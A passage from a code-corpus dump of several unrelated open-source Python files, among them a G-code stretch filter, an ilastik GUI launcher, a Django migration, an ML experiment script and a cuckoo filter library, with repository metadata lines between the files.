line.raw += " ; " + StretchFilter.OUTER_EDGE_START_MARKER
else:
logging.debug("found external perimeter inner")
line.raw += " ; " + StretchFilter.INNER_EDGE_START_MARKER
if self.current_type_line != self.UNKNOWN:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.EXTERNAL_PERIMETER
else:
logging.debug("found extra perimeter")
line.raw += " ; " + StretchFilter.LOOP_START_MARKER
if self.current_type_line != self.UNKNOWN:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.EXTRA_PERIMETER
def setup_filter(self):
edge_width_found = False
extruding = False
for self.current_layer in self.gcode.all_layers:
self.current_type_line = self.UNKNOWN
next_line_marker = None
for line_idx, line in enumerate(self.current_layer):
# checking extrusion
if not extruding and line.command in linear_move_gcodes and line.e is not None:
extruding = True
line.raw += " ; " + StretchFilter.EXTRUSION_ON_MARKER
elif extruding and line.command in linear_move_gcodes and line.e is None and self.current_type_line in (
self.EXTRA_PERIMETER, self.EXTERNAL_PERIMETER):
extruding = False
line.raw += " ; " + StretchFilter.EXTRUSION_OFF_MARKER
if next_line_marker is not None:
self.new_perimeter(line, *next_line_marker)
next_line_marker = None
# checking perimeter type
if 'TYPE:WALL-OUTER' in line.raw:
self.stop_loop(line)
next_line_marker = (True, True)
elif 'TYPE:WALL-INNER' in line.raw:
self.stop_loop(line)
next_line_marker = (True, False)
elif 'TYPE:SKIN' in line.raw:
self.stop_loop(line)
next_line_marker = (False, False)
elif 'TYPE:FILL' in line.raw:
self.stop_loop(line)
# end loop if we reach the end of the current layer
if line_idx == len(self.current_layer) - 1:
self.stop_loop(line)
# checking for edge width
match = self.CURA_PROFILE_REGEXP.match(line.raw)
if match:
edge_width_found = self.parse_cura_profile(match.group(1))
if not edge_width_found:
logging.warn("no edge width found in comments, picking a default value")
self.set_edge_width(0.4)
def parse_cura_profile(self, cura_profile):
profileOpts, alt = zlib.decompress(base64.b64decode(cura_profile)).split('\f', 1)
for option in profileOpts.split('\b'):
if len(option) > 0:
key, value = option.split('=', 1)
logging.debug("found cura option %s = %s", key, value)
if key == 'nozzle_size':
self.set_edge_width(float(value))
return True
return False
def stop_loop(self, line):
if self.current_type_line != self.UNKNOWN:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.UNKNOWN
class SkeinforgeStretchFilter(StretchFilter):
EDGE_WIDTH_REGEXP = re.compile(r'\(<edgeWidth> ([\.\d]+)')
def parse_initialisation_line(self, line):
# self.distanceFeedRate.search_decimal_places_carried(line.raw)
if line.raw == '(</extruderInitialization>)':
return True
match = self.EDGE_WIDTH_REGEXP.match(line.raw)
if match:
self.set_edge_width(float(match.group(1)))
return False
def setup_filter(self):
for self.current_layer in self.gcode.all_layers:
for line in self.current_layer:
self.parse_initialisation_line(line)
if line.command == 'M101':
line.raw += '; ' + self.EXTRUSION_ON_MARKER
elif line.command == 'M103':
line.raw += '; ' + self.EXTRUSION_OFF_MARKER
elif line.raw.startswith("(<loop>"):
line.raw += '; ' + self.LOOP_START_MARKER
elif line.raw.startswith("(<edge>") and not line.raw.startswith("(<edge> outer"):
line.raw += '; ' + self.INNER_EDGE_START_MARKER
elif line.raw.startswith("(<edge> outer"):
line.raw += '; ' + self.OUTER_EDGE_START_MARKER
elif line.raw.startswith("(</edge>)") or line.raw.startswith("(</loop>)"):
line.raw += '; ' + self.LOOP_STOP_MARKER
|
zeograd/gcodeutils
|
gcodeutils/stretch/stretch.py
|
Python
|
gpl-2.0
| 33,216
|
###############################################################################
# ilastik: interactive learning and segmentation toolkit
#
# Copyright (C) 2011-2014, the ilastik developers
# <team@ilastik.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# In addition, as a special exception, the copyright holders of
# ilastik give you permission to combine ilastik with applets,
# workflows and plugins which are not covered under the GNU
# General Public License.
#
# See the LICENSE file for details. License information is also available
# on the ilastik web site at:
# http://ilastik.org/license.html
###############################################################################
import os
import functools
import platform
#make the program quit on Ctrl+C
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
from PyQt4.QtGui import QApplication
from PyQt4.QtCore import Qt, QTimer
import splashScreen
import ilastik.config
shell = None
def startShellGui(workflow_cmdline_args, eventcapture_mode, playback_args, *testFuncs):
"""
Create an application and launch the shell in it.
"""
"""
The next two lines fix the following xcb error on Ubuntu by calling X11InitThreads before loading the QApplication:
[xcb] Unknown request in queue while dequeuing
[xcb] Most likely this is a multi-threaded client and XInitThreads has not been called
[xcb] Aborting, sorry about that.
python: ../../src/xcb_io.c:178: dequeue_pending_request: Assertion !xcb_xlib_unknown_req_in_deq failed.
"""
platform_str = platform.platform().lower()
if 'ubuntu' in platform_str or 'fedora' in platform_str or 'debian' in platform_str:
QApplication.setAttribute(Qt.AA_X11InitThreads, True)
if ilastik.config.cfg.getboolean("ilastik", "debug"):
QApplication.setAttribute(Qt.AA_DontUseNativeMenuBar, True)
if eventcapture_mode is not None:
# Only use a special QApplication subclass if we are recording.
# Otherwise, it's a performance penalty for every event processed by Qt.
from eventcapture.eventRecordingApp import EventRecordingApp
app = EventRecordingApp.create_app(eventcapture_mode, **playback_args)
else:
app = QApplication([])
_applyStyleSheet(app)
splashScreen.showSplashScreen()
app.processEvents()
QTimer.singleShot( 0, functools.partial(launchShell, workflow_cmdline_args, *testFuncs ) )
QTimer.singleShot( 0, splashScreen.hideSplashScreen)
return app.exec_()
def _applyStyleSheet(app):
"""
Apply application-wide style-sheet rules.
"""
styleSheetPath = os.path.join( os.path.split(__file__)[0], 'ilastik-style.qss' )
with file( styleSheetPath, 'r' ) as f:
styleSheetText = f.read()
app.setStyleSheet(styleSheetText)
def launchShell(workflow_cmdline_args, *testFuncs):
"""
Start the ilastik shell GUI with the given workflow type.
Note: A QApplication must already exist, and you must call this function from its event loop.
"""
# This will import a lot of stuff (essentially the entire program).
# We use a late import here so the splash screen is shown while this lengthy import happens.
from ilastik.shell.gui.ilastikShell import IlastikShell
# Create the shell and populate it
global shell
shell = IlastikShell(None, workflow_cmdline_args)
assert QApplication.instance().thread() == shell.thread()
if ilastik.config.cfg.getboolean("ilastik", "debug"):
# In debug mode, we always start with the same size window.
# This is critical for recorded test cases.
shell.resize(1000, 750)
# Also, ensure that the window title bar doesn't start off screen,
# which can be an issue when using xvfb or vnc viewers
shell.move(10,10)
shell.show()
# FIXME: The workflow_cmdline_args parameter is meant
# for arguments to the workflow, not the shell.
# This is a bit hacky.
if workflow_cmdline_args and "--fullscreen" in workflow_cmdline_args:
workflow_cmdline_args.remove('--fullscreen')
shell.showMaximized()
# Run a test (if given)
for testFunc in testFuncs:
QTimer.singleShot(0, functools.partial(testFunc, shell) )
# On Mac, the main window needs to be explicitly raised
shell.raise_()
QApplication.instance().processEvents()
return shell
|
nielsbuwen/ilastik
|
ilastik/shell/gui/startShellGui.py
|
Python
|
gpl-3.0
| 4,687
|
__author__ = 'henla464'
import time
class LoraRadioMessageAndMetadata(object):
def __init__(self, loraRadioMessage):
self.loraRadioMessage = loraRadioMessage
self.timeCreated = time.monotonic()
def GetLoraRadioMessageRS(self):
return self.loraRadioMessage
def GetTimeCreated(self):
return self.timeCreated
|
henla464/WiRoc-Python-2
|
loraradio/LoraRadioMessageAndMetadata.py
|
Python
|
gpl-3.0
| 355
|
__kupfer_name__ = _("Document Templates")
__kupfer_sources__ = ("TemplatesSource", )
__kupfer_actions__ = ("CreateNewDocument", )
__description__ = _("Create new documents from your templates")
__version__ = ""
__author__ = "Ulrik Sverdrup <ulrik.sverdrup@gmail.com>"
import os
import gio
import glib
from kupfer.objects import Leaf, Action, Source, FileLeaf
from kupfer import icons, utils
from kupfer.obj import helplib
from kupfer.obj.helplib import FilesystemWatchMixin
from kupfer import plugin_support
DEFAULT_TMPL_DIR = "~/Templates"
class Template (FileLeaf):
def __init__(self, path):
basename = glib.filename_display_basename(path)
nameroot, ext = os.path.splitext(basename)
FileLeaf.__init__(self, path, _("%s template") % nameroot)
def get_actions(self):
yield CreateDocumentIn()
for a in FileLeaf.get_actions(self):
yield a
def get_gicon(self):
file_gicon = FileLeaf.get_gicon(self)
return icons.ComposedIcon("text-x-generic-template", file_gicon)
class EmptyFile (Leaf):
def __init__(self):
Leaf.__init__(self, None, _("Empty File"))
def repr_key(self):
return ""
def get_actions(self):
yield CreateDocumentIn()
def get_icon_name(self):
return "text-x-generic"
class NewFolder (Leaf):
def __init__(self):
Leaf.__init__(self, None, _("New Folder"))
def repr_key(self):
return ""
def get_actions(self):
yield CreateDocumentIn()
def get_icon_name(self):
return "folder"
class CreateNewDocument (Action):
def __init__(self):
Action.__init__(self, _("Create New Document..."))
def has_result(self):
return True
def activate(self, leaf, iobj):
if iobj.object is not None:
# Copy the template to destination directory
basename = os.path.basename(iobj.object)
tmpl_gfile = gio.File(iobj.object)
destpath = utils.get_destpath_in_directory(leaf.object, basename)
destfile = gio.File(destpath)
tmpl_gfile.copy(destfile, flags=gio.FILE_COPY_ALL_METADATA)
elif isinstance(iobj, NewFolder):
filename = unicode(iobj)
destpath = utils.get_destpath_in_directory(leaf.object, filename)
os.makedirs(destpath)
else:
# create new empty file
filename = unicode(iobj)
f, destpath = utils.get_destfile_in_directory(leaf.object, filename)
f.close()
return FileLeaf(destpath)
def item_types(self):
yield FileLeaf
def valid_for_item(self, leaf):
return leaf.is_dir()
def requires_object(self):
return True
def object_types(self):
yield Template
yield EmptyFile
yield NewFolder
def object_source(self, for_item=None):
return TemplatesSource()
def get_description(self):
return _("Create a new document from template")
def get_icon_name(self):
return "document-new"
class CreateDocumentIn(helplib.reverse_action(CreateNewDocument)):
rank_adjust = 10
def __init__(self):
Action.__init__(self, _("Create Document In..."))
class TemplatesSource (Source, FilesystemWatchMixin):
def __init__(self):
Source.__init__(self, _("Document Templates"))
@classmethod
def _get_tmpl_dir(self):
tmpl_dir = glib.get_user_special_dir(glib.USER_DIRECTORY_TEMPLATES)
if not tmpl_dir:
tmpl_dir = os.path.expanduser(DEFAULT_TMPL_DIR)
return tmpl_dir
def initialize(self):
self.monitor_token = self.monitor_directories(self._get_tmpl_dir())
def get_items(self):
tmpl_dir = self._get_tmpl_dir()
yield EmptyFile()
yield NewFolder()
try:
for fname in os.listdir(tmpl_dir):
yield Template(os.path.join(tmpl_dir, fname))
except EnvironmentError, exc:
self.output_error(exc)
def should_sort_lexically(self):
return True
def get_description(self):
return None
def get_icon_name(self):
return "system-file-manager"
def provides(self):
yield Template
|
cjparsons74/kupfer
|
kupfer/plugin/templates.py
|
Python
|
gpl-3.0
| 3,706
|
# Copyright 2016, Tresys Technology, LLC
#
# This file is part of SETools.
#
# SETools is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1 of
# the License, or (at your option) any later version.
#
# SETools is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SETools. If not, see
# <http://www.gnu.org/licenses/>.
#
import logging
import re
from .descriptors import CriteriaDescriptor, CriteriaSetDescriptor
from .policyrep import BoundsRuletype
from .query import PolicyQuery
from .util import match_regex
class BoundsQuery(PolicyQuery):
"""
Query *bounds statements.
Parameter:
policy The policy to query.
Keyword Parameters/Class attributes:
ruletype The rule type(s) to match.
"""
ruletype = CriteriaSetDescriptor(enum_class=BoundsRuletype)
parent = CriteriaDescriptor("parent_regex")
parent_regex = False
child = CriteriaDescriptor("child_regex")
child_regex = False
def __init__(self, policy, **kwargs):
super(BoundsQuery, self).__init__(policy, **kwargs)
self.log = logging.getLogger(__name__)
def results(self):
"""Generator which yields all matching *bounds statements."""
self.log.info("Generating bounds results from {0.policy}".format(self))
self.log.debug("Ruletypes: {0.ruletype}".format(self))
self.log.debug("Parent: {0.parent!r}, regex: {0.parent_regex}".format(self))
self.log.debug("Child: {0.child!r}, regex: {0.child_regex}".format(self))
for b in self.policy.bounds():
if self.ruletype and b.ruletype not in self.ruletype:
continue
if self.parent and not match_regex(
b.parent,
self.parent,
self.parent_regex):
continue
if self.child and not match_regex(
b.child,
self.child,
self.child_regex):
continue
yield b
|
TresysTechnology/setools
|
setools/boundsquery.py
|
Python
|
lgpl-2.1
| 2,406
|
from openturns import *
from otfftw import *
from time import time
# Create a process sample
dim = 1
n = 8
tg = RegularGrid(0.0, 1.0, n)
process = SpectralNormalProcess(CauchyModel(NumericalPoint(dim, 1), NumericalPoint(dim, 1)), tg)
# Sample size
size = 3
# Sample the process
sample = process.getSample(size)
# Welch factory
factory = WelchFactory()
# FFT algorithm
fft = FFTW()
# Use this fft in the spectral process
factory.setFFTAlgorithm(fft)
# Estimate the spectral model
spectralModel = factory.build(sample)
print "spectral model=", spectralModel
|
openturns/otfftw
|
doc/UC3_Welch.py
|
Python
|
gpl-3.0
| 564
|
import os
print("hello ACM\nWhat is your name??")
exitBool = True
def talk():
print("I'm sorry, " + name + ", but I can't do that")
anyKey1 = raw_input("\nPress any key to continue...")
os.system("clear")
name = raw_input()
print("Well hello there.")
while(exitBool):
print("\n\n\n\nWhat can I do for you, " + name + "?\n")
print(" 1. Create your robot interface for you\n")
print(" 2. Exit \n")
n = int(input("Answer: "))
if n == 1:
talk()
elif n == 2:
exitBool = False
else:
print "I'm sorry, but " + n + " is not an answer"
|
ChadJPetersen/RobotisCM-530WirelessProtocol
|
src/Controller/__init__.py
|
Python
|
gpl-2.0
| 617
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'SidPoint', fields ['sidtime', 'idx']
db.create_unique('clouds_sidpoint', ['sidtime_id', 'idx'])
def backwards(self, orm):
# Removing unique constraint on 'SidPoint', fields ['sidtime', 'idx']
db.delete_unique('clouds_sidpoint', ['sidtime_id', 'idx'])
models = {
'clouds.image': {
'Meta': {'object_name': 'Image'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'unique': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intensity': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'sidtime': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.SidTime']", 'null': 'True'})
},
'clouds.line': {
'Meta': {'object_name': 'Line'},
'average_flux': ('django.db.models.fields.FloatField', [], {'default': '0.0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_flux': ('django.db.models.fields.FloatField', [], {'default': '0.0'}),
'realpoint_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'sidpoint_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'stddev_flux': ('django.db.models.fields.FloatField', [], {'default': '0.0'})
},
'clouds.realpoint': {
'Meta': {'ordering': "['image__datetime']", 'object_name': 'RealPoint'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'flux': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'idx': ('django.db.models.fields.IntegerField', [], {}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.Image']"}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.Line']", 'null': 'True'}),
'sidpoint': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.SidPoint']", 'null': 'True'}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {})
},
'clouds.sidpoint': {
'Meta': {'ordering': "['sidtime__time']", 'unique_together': "(('sidtime', 'idx'),)", 'object_name': 'SidPoint'},
'flux': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'idx': ('django.db.models.fields.IntegerField', [], {}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.Line']", 'null': 'True'}),
'prev': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['clouds.SidPoint']", 'unique': 'True', 'null': 'True'}),
'sidtime': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.SidTime']"}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {})
},
'clouds.sidtime': {
'Meta': {'object_name': 'SidTime'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'time': ('django.db.models.fields.TimeField', [], {'unique': 'True'})
}
}
complete_apps = ['clouds']
|
Bjwebb/detecting-clouds
|
clouds/migrations/0013_auto__add_unique_sidpoint_sidtime_idx.py
|
Python
|
mit
| 3,727
|
# Copyright 2017 Max W. Y. Lam
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import sys
sys.path.append("../../../")
import os
import time
import tensorflow as tf
import tensorflow.contrib.layers as layers
from six.moves import range, zip
import numpy as np
import zhusuan as zs
from expt import run_experiment
DATA_PATH = 'CASP.csv'
def load_data(n_folds):
np.random.seed(314159)
import pandas as pd
data = pd.DataFrame.from_csv(path=DATA_PATH, header=0, index_col=None)
data = data.sample(frac=1).dropna(axis=0).as_matrix().astype(np.float32)
X, y = data[:, 1:], data[:, 0]
y = y[:, None]
n_data = y.shape[0]
n_partition = n_data//n_folds
n_train = n_partition*(n_folds-1)
dataset, folds = [], []
for i in range(n_folds):
if(i == n_folds-1):
fold_inds = np.arange(n_data)[i*n_partition:]
else:
fold_inds = np.arange(n_data)[i*n_partition:(i+1)*n_partition]
folds.append([X[fold_inds], y[fold_inds]])
for i in range(n_folds):
valid_fold, test_fold = i, (i+1)%n_folds
train_folds = np.setdiff1d(np.arange(n_folds), [test_fold, valid_fold])
X_train = np.vstack([folds[fold][0] for fold in train_folds])
y_train = np.vstack([folds[fold][1] for fold in train_folds])
X_valid, y_valid = folds[valid_fold]
X_test, y_test = folds[test_fold]
dataset.append([X_train, y_train, X_valid, y_valid, X_test, y_test])
return dataset
if __name__ == '__main__':
if('cpu' in sys.argv):
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
model_names = [
'DNN', 'VIBayesNN', 'MCDropout', 'SSA'
]
dataset = load_data(5)
N, D = dataset[0][0].shape
T, P = dataset[0][-1].shape
print("N = %d, D = %d, T = %d, P = %d"%(N, D, T, P))
# Fair Model Comparison - Same Architecture & Optimization Rule
training_settings = {
'task': "regression",
'save': False,
'plot': True,
'n_basis': 50,
'drop_rate': 0.15,
'train_samples': 20,
'test_samples': 100,
'max_iters': 1000,
'n_hiddens': [100, 50, 25],
'batch_size': 100,
'learn_rate': 1e-3,
'max_epochs': 1500,
'early_stop': 5,
'check_freq': 5,
}
for argv in sys.argv:
if('--' == argv[:2] and '=' in argv):
eq_ind = argv.index('=')
setting_feature = argv[2:eq_ind]
setting_value = argv[eq_ind+1:]
if(setting_feature in ['save', 'plot']):
training_settings[setting_feature] = (setting_value=='True')
if(setting_feature == 'model'):
model_names = [setting_value]
print(training_settings)
eval_rmses, eval_lls = run_experiment(
model_names, 'Protein', dataset, **training_settings)
print(eval_rmses, eval_lls)
for model_name in model_names:
rmse_mu = np.mean(eval_rmses[model_name])
rmse_std = np.std(eval_rmses[model_name])
ll_mu = np.mean(eval_lls[model_name])
ll_std = np.std(eval_lls[model_name])
print('>>> '+model_name)
print('>> RMSE = {:.4f} \pm {:.4f}'.format(rmse_mu, 1.96*rmse_std))
print('>> NLPD = {:.4f} \pm {:.4f}'.format(ll_mu, 1.96*ll_std))
|
MaxInGaussian/ZS-VAFNN
|
uci-expts/regression/protein/training.py
|
Python
|
apache-2.0
| 3,917
|
""" Cuckoo Filter, python implementation
License: MIT
Author: Tyler Barrus (barrust@gmail.com)
"""
import math
import random
from array import array
from io import BytesIO, IOBase
from mmap import mmap
from numbers import Number
from pathlib import Path
from struct import Struct
from typing import ByteString, List, Tuple, Union
from ..exceptions import CuckooFilterFullError, InitializationError
from ..hashes import KeyT, SimpleHashT, fnv_1a
from ..utilities import MMap, get_x_bits, is_valid_file
class CuckooFilter:
"""Simple Cuckoo Filter implementation
Args:
capacity (int): The number of bins
bucket_size (int): The number of buckets per bin
max_swaps (int): The number of cuckoo swaps before stopping
expansion_rate (int): The rate at which to expand
auto_expand (bool): If the filter should automatically expand
finger_size (int): The size of the fingerprint to use in bytes \
(between 1 and 4); exported as 4 bytes; up to the user to \
reset the size correctly on import
filepath (str): The path to the file to load or None if no file
hash_function (function): Hashing strategy function to use `hf(key)`
Returns:
CuckooFilter: A Cuckoo Filter object"""
__slots__ = [
"_bucket_size",
"_cuckoo_capacity",
"__max_cuckoo_swaps",
"__expansion_rate",
"__auto_expand",
"_fingerprint_size",
"__hash_func",
"_inserted_elements",
"_buckets",
"_error_rate",
]
def __init__(
self,
capacity: int = 10000,
bucket_size: int = 4,
max_swaps: int = 500,
expansion_rate: int = 2,
auto_expand: bool = True,
finger_size: int = 4,
filepath: Union[str, Path, None] = None,
hash_function: Union[SimpleHashT, None] = None,
):
"""setup the data structure"""
valid_prms = (
isinstance(capacity, Number)
and capacity >= 1
and isinstance(bucket_size, Number)
and bucket_size >= 1
and isinstance(max_swaps, Number)
and max_swaps >= 1
)
if not valid_prms:
msg = "CuckooFilter: capacity, bucket_size, and max_swaps must be an integer greater than 0"
raise InitializationError(msg)
self._bucket_size = int(bucket_size)
self._cuckoo_capacity = int(capacity)
self.__max_cuckoo_swaps = int(max_swaps)
self.__expansion_rate = 2
self.expansion_rate = expansion_rate
self.__auto_expand = True
self.auto_expand = auto_expand
self._fingerprint_size = 32
self.fingerprint_size = finger_size
if hash_function is None:
self.__hash_func = fnv_1a
else:
self.__hash_func = hash_function # type: ignore
self._inserted_elements = 0
if filepath is None:
self._buckets = list() # type: ignore
for _ in range(self.capacity):
self.buckets.append(list())
elif is_valid_file(filepath):
self._load(filepath)
else:
msg = "CuckooFilter: failed to load provided file"
raise InitializationError(msg)
self._error_rate = float(self._calc_error_rate())
@classmethod
def init_error_rate(
cls,
error_rate: float,
capacity: int = 10000,
bucket_size: int = 4,
max_swaps: int = 500,
expansion_rate: int = 2,
auto_expand: bool = True,
hash_function: Union[SimpleHashT, None] = None,
):
"""Initialize a simple Cuckoo Filter based on error rate
Args:
error_rate (float):
capacity (int): The number of bins
bucket_size (int): The number of buckets per bin
max_swaps (int): The number of cuckoo swaps before stopping
expansion_rate (int): The rate at which to expand
auto_expand (bool): If the filter should automatically expand
hash_function (function): Hashing strategy function to use \
`hf(key)`
Returns:
CuckooFilter: A Cuckoo Filter object"""
cku = CuckooFilter(
capacity=capacity,
bucket_size=bucket_size,
auto_expand=auto_expand,
max_swaps=max_swaps,
expansion_rate=expansion_rate,
hash_function=hash_function,
)
cku._set_error_rate(error_rate)
return cku
@classmethod
def load_error_rate(
cls, error_rate: float, filepath: Union[str, Path], hash_function: Union[SimpleHashT, None] = None
):
"""Initialize a previously exported Cuckoo Filter based on error rate
Args:
error_rate (float):
filepath (str): The path to the file to load or None if no file
hash_function (function): Hashing strategy function to use `hf(key)`
Returns:
CuckooFilter: A Cuckoo Filter object"""
cku = CuckooFilter(filepath=filepath, hash_function=hash_function)
cku._set_error_rate(error_rate)
return cku
@classmethod
def frombytes(
cls, b: ByteString, error_rate: Union[float, None] = None, hash_function: Union[SimpleHashT, None] = None
) -> "CuckooFilter":
"""
Args:
b (ByteString): The bytes to load as a Expanding Bloom Filter
error_rate (float): The error rate of the cuckoo filter, if used to generate the original filter
hash_function (function): Hashing strategy function to use `hf(key, number)`
Returns:
CuckooFilter: A Bloom Filter object
"""
cku = CuckooFilter(hash_function=hash_function)
cku._load(b) # type: ignore
# if error rate is provided, use it
cku._set_error_rate(error_rate)
return cku
def __contains__(self, key: KeyT) -> bool:
"""setup the `in` keyword"""
return self.check(key)
def __str__(self):
"""setup what it will print"""
msg = (
"{0}:\n"
"\tCapacity: {1}\n"
"\tTotal Bins: {2}\n"
"\tLoad Factor: {3}%\n"
"\tInserted Elements: {4}\n"
"\tMax Swaps: {5}\n"
"\tExpansion Rate: {6}\n"
"\tAuto Expand: {7}"
)
return msg.format(
self.__class__.__name__,
self.capacity,
self.capacity * self.bucket_size,
self.load_factor() * 100,
self.elements_added,
self.max_swaps,
self.expansion_rate,
self.auto_expand,
)
@property
def elements_added(self) -> int:
"""int: The number of elements added
Note:
Not settable"""
return self._inserted_elements
@property
def capacity(self) -> int:
"""int: The number of bins
Note:
Not settable"""
return self._cuckoo_capacity
@property
def max_swaps(self) -> int:
"""int: The maximum number of swaps to perform
Note:
Not settable"""
return self.__max_cuckoo_swaps
@property
def bucket_size(self) -> int:
"""int: The number of buckets per bin
Note:
Not settable"""
return self._bucket_size
@property
def buckets(self) -> List[List[int]]:
"""list(list): The buckets holding the fingerprints
Note:
Not settable"""
return self._buckets
@property
def expansion_rate(self) -> int:
"""int: The rate at expansion when the filter grows"""
return self.__expansion_rate
@expansion_rate.setter
def expansion_rate(self, val: int):
"""set the self expand value"""
self.__expansion_rate = val
@property
def error_rate(self) -> float:
"""float: The error rate of the cuckoo filter"""
return self._error_rate
@property
def auto_expand(self) -> bool:
"""bool: True if the cuckoo filter will expand automatically"""
return self.__auto_expand
@auto_expand.setter
def auto_expand(self, val: bool):
"""set the self expand value"""
self.__auto_expand = bool(val)
@property
def fingerprint_size_bits(self) -> int:
"""int: The size in bits of the fingerprint"""
return self._fingerprint_size
@property
def fingerprint_size(self) -> int:
"""int: The size in bytes of the fingerprint
Raises:
ValueError: If the size is not between 1 and 4
Note:
The size of the fingerprint must be between 1 and 4"""
return math.ceil(self.fingerprint_size_bits / 8)
@fingerprint_size.setter
def fingerprint_size(self, val: int):
"""set the fingerprint size"""
tmp = val
if not 1 <= tmp <= 4:
msg = ("{}: fingerprint size must be between 1 and 4").format(self.__class__.__name__)
raise ValueError(msg)
# bytes to bits
self._fingerprint_size = tmp * 8
self._calc_error_rate() # if updating fingerprint size then error rate may change
def load_factor(self) -> float:
"""float: How full the Cuckoo Filter is currently"""
return self.elements_added / (self.capacity * self.bucket_size)
def add(self, key: KeyT):
"""Add element key to the filter
Args:
key (str): The element to add
Raises:
CuckooFilterFullError: When element not inserted after maximum number of swaps or 'kicks'"""
idx_1, idx_2, fingerprint = self._generate_fingerprint_info(key)
is_present = self._check_if_present(idx_1, idx_2, fingerprint)
if is_present is not None: # already there, nothing to do
return
finger = self._insert_fingerprint(fingerprint, idx_1, idx_2)
self._deal_with_insertion(finger)
def check(self, key: KeyT) -> bool:
"""Check if an element is in the filter
Args:
key (str): Element to check
Returns:
bool: True if likely present, False if definately not"""
idx_1, idx_2, fingerprint = self._generate_fingerprint_info(key)
is_present = self._check_if_present(idx_1, idx_2, fingerprint)
if is_present is not None:
return True
return False
def remove(self, key: KeyT) -> bool:
"""Remove an element from the filter
Args:
key (str): Element to remove
Returns:
bool: True if removed, False if not present"""
idx_1, idx_2, fingerprint = self._generate_fingerprint_info(key)
idx = self._check_if_present(idx_1, idx_2, fingerprint)
if idx is None:
return False
self.buckets[idx].remove(fingerprint)
self._inserted_elements -= 1
return True
def export(self, file: Union[Path, str, IOBase, mmap]) -> None:
"""Export cuckoo filter to file
Args:
file: Path to file to export"""
if not isinstance(file, (IOBase, mmap)):
with open(file, "wb") as filepointer:
self.export(filepointer) # type:ignore
else:
filepointer = file # type:ignore
for i in range(len(self.buckets)):
bucket = array(self._CUCKOO_SINGLE_INT_C, self.buckets[i])
bucket.extend([0] * (self.bucket_size - len(bucket)))
bucket.tofile(filepointer)
# now put out the required information at the end
filepointer.write(self._CUCKOO_FOOTER_STRUCT.pack(self.bucket_size, self.max_swaps))
def __bytes__(self) -> bytes:
"""Export cuckoo filter to `bytes`"""
with BytesIO() as f:
self.export(f)
return f.getvalue()
def expand(self):
"""Expand the cuckoo filter"""
self._expand_logic(None)
def _insert_fingerprint(self, fingerprint, idx_1, idx_2):
"""insert a fingerprint"""
if self.__insert_element(fingerprint, idx_1):
self._inserted_elements += 1
return None
if self.__insert_element(fingerprint, idx_2):
self._inserted_elements += 1
return None
# we didn't insert, so now we need to randomly select one index to use
# and move things around to the other index, if possible, until we
# either move everything around or hit the maximum number of swaps
idx = random.choice([idx_1, idx_2])
for _ in range(self.max_swaps):
# select one element to be swapped out...
swap_elm = random.randint(0, self.bucket_size - 1)
swb = self.buckets[idx][swap_elm]
fingerprint, self.buckets[idx][swap_elm] = swb, fingerprint
# now find another place to put this fingerprint
index_1, index_2 = self._indicies_from_fingerprint(fingerprint)
idx = index_2 if idx == index_1 else index_1
if self.__insert_element(fingerprint, idx):
self._inserted_elements += 1
return None
# if we got here we have an error... we might need to know what is left
return fingerprint
def _load(self, file: Union[Path, str, IOBase, mmap, bytes]) -> None:
"""load a cuckoo filter from file"""
if not isinstance(file, (IOBase, mmap, bytes)):
file = Path(file)
with MMap(file) as filepointer:
self._load(filepointer)
else:
self._parse_footer(file) # type: ignore
self._inserted_elements = 0
# now pull everything in!
self._parse_buckets(file) # type: ignore
_CUCKOO_SINGLE_INT_C = "I"
_CUCKOO_SINGLE_INT_SIZE = Struct(_CUCKOO_SINGLE_INT_C).size
_CUCKOO_FOOTER_STRUCT = Struct("II")
